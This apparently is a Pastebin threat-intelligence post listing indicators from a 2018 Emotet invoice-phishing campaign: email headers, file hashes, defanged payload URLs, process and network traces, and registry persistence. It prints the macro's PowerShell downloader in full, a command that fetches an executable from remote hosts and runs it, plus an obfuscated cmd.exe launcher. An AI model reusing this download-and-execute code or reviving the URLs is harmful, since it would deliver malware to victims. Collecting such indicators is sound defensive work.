Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Emotet #W97M #Macro #powershell
- https://pastebin.com/Y6DnbpHv
- email_headers
- --------------
- #1
- Received: from a27-50.smtp-out.us-west-2.amazonses{.} com (a27-50.smtp-out.us-west-2.amazonses{.} com [54.240.27.50])
- by mailsrv.victim{.} com (8.15.2/8.15.2) with ESMTP id w918l0k9089312
- for <user1@victim{.} com>; Mon, 1 Oct 2018 11:47:00 +0300 (EEST)
- (envelope-from 010101662ecf0227-5c3272a9-ff0e-4f05-9508-b53355b30f17-000000@us-west-2.amazonses{.} com)
- Date: Mon, 1 Oct 2018 08:46:50 +0000
- From: Интернет-магазин С торгом <ar@champlungmaslegian{.} com>
- To: user1@victim{.} com
- Subject: Invoice from Интернет-магазин С торгом
- #2
- Received-PRA: pass ;
- Received-SPF: pass ;
- Received: from mail.btconnect{.} com (rdslmr.btconnect{.} com [62.239.164.79]) by mail2.victim2{.} com with smtp id 70c8_00a5_2d799447_045b_463e_aea7_60b44e018a09;
- Mon, 01 Oct 2018 11:46:29 +0300
- Received: from mail.btconnect{.} com (rd11780omr12.iuser.iroot.adidom{.} com [10.187.89.173])
- by rd11780slr11.dci.bt{.} com (MOS 4.4.8-GA)
- with ESMTP id AMS19190;
- Mon, 1 Oct 2018 09:46:27 +0100
- Received: (from localhost [127.0.0.1])
- by rd11780omr12.dci.bt{.} com (MOS 4.4.8-GA)
- id QYL41356;
- Mon, 1 Oct 2018 09:46:27 +0100 (BST)
- Received: from router-heim.i-netpartner.net (EHLO 10.5.21.12) ([217.23.56.98])
- by rd11780omr12.dci.bt{.} com
- with ESMTP id QYL41299 (AUTH parkhillvets@btconnect{.} com);
- Mon, 01 Oct 2018 09:46:26 +0100 (BST)
- Date: Mon, 01 Oct 2018 10:46:26 +0100
- From: Ващенко Інна <inna@razumkov.org.ua> <parkhillvets@btconnect{.} com>
- To: user2@victim2
- Subject: Invoice from Ващенко Інна
- files
- --------------
- SHA-256 84803f2f3f575a5cb48fd7eabd9b0e8e73776b2fd8f3b3e098c8709d282c7fd7
- File name FILE_58873.doc
- File size 66.63 KB
- SHA-256 fe516708fe6db062b525795e67100e846257135e5a30526839ed405bf05ed4a5
- File name U5CUyRF7hzz.exe
- File size 184 KB
- h11p: \gidamikrobiyoloji{.} com/IBfAlRX
- h11p: \madisonda{.} com/BacOqsvFqz
- h11p: \motiondev{.} com{.} br/1cTvBSu2P
- h11p: \fluorescent{.} cc/KxcY1d6R
- h11p: \kristianmarlow{.} com/Sy5IRFsRU9
- powershell $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
- activity
- **************
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\CMd.exe /V/C"^s^e^t ^B^J^1=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}{^hc^t^ac}^;^k^a^er^b^;^F^M^K^$^ ^m^e^t^I-^e^k^ovn^I^;)^F^M^K^$^ ,E^A^H^$(^e^l^i^F^d^a^o^ln^w^o^D^.^qn^K^$^{^yrt^{)h^b^i^$^ n^i^ ^E^A^H^$(^hc^a^er^of^;^'^e^x^e^.^......
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $Knq=new-object Net.WebClient;$ibh='h11p: \gidamikrobiyoloji{.} com/IBfAlRX@h11p: \madisonda{.} com/BacOqsvFqz@h11p: \motiondev{.} com{.} br/1cTvBSu2P@h11p: \fluorescent{.} cc/KxcY1d6R@h11p: \kristianmarlow{.} com/Sy5IRFsRU9'.Split('@');$tFI = '992';$KMF=$env:public+'\'+$tFI+'.exe';foreach($HAE in $ibh){try{$Knq.DownloadFile($HAE, $KMF);Invoke-Item $KMF;break;}catch{}}
- "C:\Users\Public\992.exe"
- "C:\Users\operator\AppData\Local\Microsoft\Windows\xpathcab.exe"
- netwrk
- --------------
- 185.179.26.24 gidamikrobiyoloji{.} com GET /IBfAlRX/ HTTP/1.1 no User Agent
- "190.2.50.193","190.2.50.193:443","GET / HTTP/1.1 ","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
- comp
- --------------
- powershell.exe 1556 185.179.26.24 80 ESTABLISHED
- xpathcab.exe 3720 190.215.241.14 8080 SYN_SENT
- xpathcab.exe 3720 190.2.50.193 443 SYN_SENT
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 01.10.2018 14:22
- xpathcab c:\users\operator\appdata\local\microsoft\windows\xpathcab.exe 01.10.2018 13:00
- # # #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement